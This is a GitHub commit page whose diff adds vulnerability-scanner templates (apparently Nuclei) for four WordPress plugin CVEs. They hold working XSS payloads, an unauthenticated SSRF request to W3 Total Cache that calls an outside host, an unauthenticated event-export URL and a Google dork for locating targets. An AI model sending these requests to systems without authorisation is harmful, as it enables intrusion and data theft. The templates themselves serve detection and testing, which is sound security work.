-
Notifications
You must be signed in to change notification settings - Fork 289
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
de6f1a4
commit d2c01e9
Showing
6 changed files
with
143 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1 +1 @@ | ||
| 20250101 | ||
| 20250102 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| id: CVE-2011-5265 | ||
| info: | ||
| name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting | ||
| author: daffainfo | ||
| severity: medium | ||
| description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. | ||
| reference: | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 | ||
| - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/ | ||
| - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468 | ||
| classification: | ||
| cve-id: CVE-2011-5265 | ||
| metadata: | ||
| google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" | ||
| tags: cve,cve2011,wordpress,xss,wp-plugin | ||
| requests: | ||
| - method: GET | ||
| path: | ||
| - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "</script><script>alert(document.domain)</script>" | ||
| part: body | ||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/html | ||
| - type: status | ||
| status: | ||
| - 200 | ||
|
|
||
| # Enhanced by mp on 2022/02/21 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,30 @@ | ||
| id: CVE-2019-6715 | ||
|
|
||
| info: | ||
| name: CVE-2019-6715 | ||
| author: randomrobbie | ||
| severity: high | ||
| description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF | ||
| tags: cve,cve2019,wordpress,wp-plugin,ssrf | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
| cvss-score: 7.50 | ||
| cve-id: CVE-2019-6715 | ||
| reference: | ||
| - https://vinhjaxt.github.io/2019/03/cve-2019-6715 | ||
| - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "TmVzc3VzQ29kZUV4ZWNUZXN0" | ||
| part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| id: CVE-2021-24146 | ||
| info: | ||
| name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure | ||
| author: random_robbie | ||
| severity: high | ||
| description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc | ||
| - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24146 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N | ||
| cvss-score: 7.5 | ||
| cve-id: CVE-2021-24146 | ||
| cwe-id: CWE-284 | ||
| tags: wordpress,wp-plugin,cve,cve2021 | ||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - "mec-events" | ||
| - "text/csv" | ||
| condition: and | ||
| part: header | ||
| - type: status | ||
| status: | ||
| - 200 | ||
|
|
||
| # Enhanced by mp on 2022/06/22 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| id: CVE-2021-24498 | ||
|
|
||
| info: | ||
| name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
| author: suman_kar | ||
| description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. | ||
| severity: medium | ||
| tags: cve,cve2021,xss,wordpress,wp-plugin | ||
| reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.10 | ||
| cve-id: CVE-2021-24498 | ||
| cwe-id: CWE-79 | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Accept-Encoding: gzip, deflate | ||
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | ||
| Connection: close | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - '><svg/onload=alert(1)><' | ||
| - 'Calendar Details' | ||
| part: body | ||
| condition: and | ||
|
|
||
| - type: word | ||
| words: | ||
| - 'text/html' | ||
| part: header | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |